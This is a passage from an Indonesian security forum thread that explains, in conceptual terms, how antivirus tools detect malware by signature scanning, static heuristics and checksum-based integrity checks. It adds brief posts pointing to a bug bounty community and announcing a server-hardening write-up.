Bila ada sebuah file yang dicurigai sebagai virus, maka file ini terlebih dulu dianalisa oleh seorang analis malware. Malware ini dipelajari perilaku dan karakteristiknya, kemudian dibuat sebuah signature. Proses scanning merupakan sebuah proses mencari apakah pada sebuah file terdapat signature malware. Bila terdapat signature malware pada file tersebut berarti file telah terinfeksi malware, bila tidak maka file tersebut bersih. Ada banyak algoritma yang digunakan untuk melakukan scanning. Diantaranya ada algoritma Aho-Corasick, algoritma Veldmann dan wu-Manber. Algoritma-algoritma diatas berkembang didasarkan pada teori pattern matching dan finite automata.

2. Static Heuristic

Bila teknik scanning digunakan untuk melakukan deteksi terhadap malware yang sudah dikenali karakteristiknya, maka teknik Heuristic umumnya digunakan untuk malware yang belum dikenali karakteristiknya. Teknik ini tidak melakukan pencarian signature malware, tapi akan berusaha membuat signature baru. Jadi teknik ini berusaha menduplikasi cara seorang analis malware dalam mengenali malware dari source codenya. Umumnya teknik ini akan mencari pada source code apakah terdapat aktifitas atau fungsi yang mencurigakan. Contohnya adalah adanya fungsi untuk menggandakan dirinya (replikasi), atau fungsi untuk mengelabui antivirus (obfuscation) dll. Teknik ini umumnya memiliki tingkat akurasi yang rendah dan banyak menghasilkan false positive (alarm palsu). Biasanya teknik ini akan mempunyai list banyak kriteria karakteristik malware yang diberi bobot nilai tertentu, kemudian bila kriteria tersebut ditemukan maka nanti nilai tersebut akan dijumlahkan. Bila hasil perhitungan tadi mencapai batas nilai tertentu maka antivirus akan memberikan alarm adanya dugaan malware. Teknik ini banyak menggunakan teori dari sistem pakar, neural network dan data mining.

3. Integrity check

Malware yang menginfeksi sebuah file, umumnya akan melakukan modifikasi pada file. Sehingga bila terjadi perubahan pada sebuah file tanpa ada authorisasi yang jelas, maka aktifitas ini dicurigai sebagai adanya malware. Teknik ini umumnya menggunakan checksum, jadi antivirus akan melakukan checksum terhadap file, kemudian checksum ini akan di input ke dalam database. Bila antivirus melakukan scanning maka checksum terbaru akan dibandingkan dengan checksum yang ada di database. Bila terjadi perubahan maka antivirus akan memberikan alarm. Teknik ini memiliki kelemahan yaitu memberikan hasil akurasi yang kurang baik.

Ketiga teknik diatas termasuk teknik deteksi malware yang menggunakan metoda deteksi static, artinya pada proses deteksi, code malware tidak dijalankan. Selain itu ada juga metoda deteksi analsis behavioral. Tentang metoda ini akan saya ceritakan pada tulisan berikutnya. Semoga bermanfaat!
 
Bug Bounty Community

pengen belajar tentang bug bounty, bisa main2 di beberapa komunitas atau bug bounty platform berikut ini:

https://www.cyberarmy.id/id/

CYBER INDONESIA YANG SANTUN BERETIKA DAN PEMBERI SOLUSI
 
Terakhir diubah:
Bimabet
KITA BISA OPREK WEB GAK ADA SALAHNYA KITA BELAJAR MENGAMANKAN SERVER

TEKNIK HARDENING SERVER
refrensi : makul telkomuniversity

/! COMINGSOON /
 
Terakhir diubah:
Jav Toys
Gaple Online Indonesia
Pasang iklan hanya lewat CONTACT US
Back
Top
We are now part of LS Media Ltd